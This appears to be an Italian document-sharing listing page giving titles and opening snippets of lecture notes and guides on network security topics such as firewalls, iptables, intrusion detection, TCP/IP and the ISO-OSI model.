1 Caratteristiche generali Nati dall esperienza maturata nell ambito della sicurezza informatica, gli ECWALL di e-creation rispondono in modo brillante alle principali esigenze di connettività delle aziende:
DettagliIl firewall Packet filtering statico in architetture avanzate
protezione delle reti Il firewall Packet filtering statico in architetture avanzate FABIO GARZIA DOCENTE ESPERTO DI SECURITY UN FIREWALL PERIMETRALE È IL PUNTO CENTRALE DI DIFESA NEL PERIMETRO DI UNA RETE
DettagliSicurezza nelle Reti Esercizi in preparazione all esame versione 1.1.3
Sicurezza nelle Reti Esercizi in preparazione all esame versione 1.1.3 Indice 1 Note di lettura 4 1.1 Configurazione servizi...................... 5 1.1.1 FTP passivo....................... 5 1.1.2 FTP
DettagliComunicazione tra Computer. Protocolli. Astrazione di Sottosistema di Comunicazione. Modello di un Sottosistema di Comunicazione
I semestre 03/04 Comunicazione tra Computer Protocolli Prof. Vincenzo Auletta auletta@dia.unisa.it http://www.dia.unisa.it/professori/auletta/ Università degli studi di Salerno Laurea in Informatica 2
DettagliAutore: Bandiera Roberto 2016
Configurare il servizio DHCP in uno Switch Multilayer per più VLAN Si vuole attivare la configurazione dinamica degli indirizzi IP nelle diverse VLAN di una rete aziendale. Questo risulta particolarmente
Dettagli1 - STATO DELL ARTE DEI SISTEMI DI VIDEOSORVEGLIANZA...7
INDICE 1 - STATO DELL ARTE DEI SISTEMI DI VIDEOSORVEGLIANZA...7 1.1 - INTRODUZIONE...7 1.2 - EVOLUZIONE DEI SISTEMI DI VIDEOSORVEGLIANZA...10 1.2.1 - Sistemi di videosorveglianza di prima generazione (first-generation
DettagliEsercitazione 7 Sommario Firewall introduzione e classificazione Firewall a filtraggio di pacchetti Regole Ordine delle regole iptables 2 Introduzione ai firewall Problema: sicurezza di una rete Necessità
DettagliLe Reti Informatiche
Le Reti Informatiche modulo 2 Prof. Salvatore Rosta www.byteman.it s.rosta@byteman.it 1 Commutazione di Circuito Le reti telefoniche utilizzano la tecnica della commutazione di circuito. I commutatori
DettagliFirewall e Abilitazioni porte (Port Forwarding)
Firewall e Abilitazioni porte (Port Forwarding) 1 Introduzione In questa mini-guida mostreremo come creare le regole sul Firewall integrato del FRITZ!Box per consentire l accesso da Internet a dispositivi
DettagliMariarosaria Napolitano. Architettura TCP/IP. Corso di: Laboratorio di tecnologie informatiche e telematiche
Mariarosaria Napolitano Architettura TCP/IP Corso di: Laboratorio di tecnologie informatiche e telematiche Contesto e Prerequisiti Contesto E' rivolto agli studenti del V anno degli Istituti Tecnici Industriali
DettagliArchitetture di sistema
Università di Bergamo Facoltà di Ingegneria Applicazioni Internet B Paolo Salvaneschi B1_1 V1.6 Architetture di sistema Il contenuto del documento è liberamente utilizzabile dagli studenti, per studio
DettagliIntrusion Detection Systems
Intrusion Detection Systems Introduzione, Tecnologie, Implementazione Ing. Stefano Zanero Politecnico di Milano Richiamiamo il punto chiave Continuando a usare il paradigma classico Who are you? What can
DettagliRealizzazione di una Infrastruttura di Sicurezza
Realizzazione di una Infrastruttura di Sicurezza Andrea Lanzi, Lorenzo Martignoni e Lorenzo Cavallaro Dipartimento di Informatica e Comunicazione Facoltà di Scienze MM.FF.NN. Università degli Studi di
DettagliIntrusion Detection System. Giampaolo Fresi Roglia gianz@security.dico.unimi.it
Intrusion Detection System Giampaolo Fresi Roglia gianz@security.dico.unimi.it Sommario Introduzione Richiami alla sicurezza Informatica Intrusion Detection Systems Strategie di monitoraggio Localizzazione
DettagliLa sicurezza delle Reti: aspetti tecnici e legislativi Napoli, 16 maggio 2007 Aula Magna Facoltà di Ingegneria
Il C.S.I.F. La sicurezza delle Reti: aspetti tecnici e legislativi Napoli, 16 maggio 2007 Aula Magna Facoltà di Ingegneria I I Pericoli della rete La soluzione adottata al C.S.I.F. Ing. Michelangelo Cudillo
DettagliSicurezza delle reti 1. Uso di variabili. Mattia Monga. a.a. 2010/11
1 Mattia Lezione VIII: Sicurezza perimetrale Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi
DettagliReti di Calcolatori Servizi di Rete Laboratorio di Didattica in Rete
Reti di Calcolatori Servizi di Rete Laboratorio di Didattica in Rete Reti di calcolatori Protocolli di Trasmissione: Il modello ISO/OSI L architettura TCP/IP Protocolli di trasmissione Un protocollo di
DettagliTrusted Intermediaries
Sicurezza Trusted Intermediaries Symmetric key problem: How do two entities establish shared secret key over network? Solution: trusted key distribution center (KDC) acting as intermediary between entities
DettagliLo strato di trasporto Firewall e NAT
Lo strato di trasporto Firewall e NAT A.A. 2009/2010 Walter Cerroni Il livello di trasporto in Internet APP. collegamento logico tra i processi applicativi APP. TCP UDP collegamento logico tra i due host
DettagliAutore: Bandiera Roberto 2016
Access List per controllare il traffico interno di una rete Si vogliono applicare alcune tipiche aziendale. politiche di sicurezza per controllare il traffico interno di una rete Si considera la rete aziendale
DettagliFiltraggio del traffico di rete
Laboratorio di Amministrazione di Sistemi L-A Filtraggio del traffico di rete Si ringraziano sentitamente: Angelo Neri (CINECA) per il materiale sulla classificazione, le architetture ed i principi di
DettagliDal protocollo IP ai livelli superiori
Dal protocollo IP ai livelli superiori Prof. Enrico Terrone A. S: 2008/09 Protocollo IP Abbiamo visto che il protocollo IP opera al livello di rete definendo indirizzi a 32 bit detti indirizzi IP che permettono
DettagliGestione degli accessi al sistema(autenticazione) e ai locali. Analisi del traffico di rete (Firewall, IDS/IPS)
Contromisure Contromisure Gestione degli accessi al sistema(autenticazione) e ai locali Antivirus Analisi del traffico di rete (Firewall, IDS/IPS) Analisi utilizzo delle risorse di sistema, accessi (IDS/IPS)
DettagliFirewall. Alfredo De Santis. Maggio 2014. Dipartimento di Informatica Università di Salerno. ads@dia.unisa.it http://www.dia.unisa.
Firewall Alfredo De Santis Dipartimento di Informatica Università di Salerno ads@dia.unisa.it http://www.dia.unisa.it/professori/ads Maggio 2014 Pacchetti I messaggi sono divisi in pacchetti I pacchetti
DettagliElementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing. Chiara Braghin chiara.braghin@unimi.it
Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing Chiara Braghin chiara.braghin@unimi.it Sniffing (1) Attività di intercettazione passiva dei dati che transitano in una rete telematica, per:
DettagliArchitetture di sistema
Università di Bergamo Facoltà di Ingegneria Applicazioni Internet B Paolo Salvaneschi B1_1 V1.7 Architetture di sistema Il contenuto del documento è liberamente utilizzabile dagli studenti, per studio
DettagliLezione 8 Il networking. Mauro Piccolo piccolo@di.unito.it
Lezione 8 Il networking Mauro Piccolo piccolo@di.unito.it Classificazione delle reti Ampiezza Local Area Network Metropolitan Area Networ Wide Area Network Proprieta' Reti aperte e reti chiuse Topologia
DettagliUD 3 PROTOCOLLO ISO-OSI
UD 3 PROTOCOLLO ISO-OSI IL PROTOCOLLO All inizio ogni azienda creava dispositivo hw e sw in grado solo di essere utilizzati e di comunicare con dispositivi dell azienda stessa Sistemi Chiusi Nel tempo
Dettagli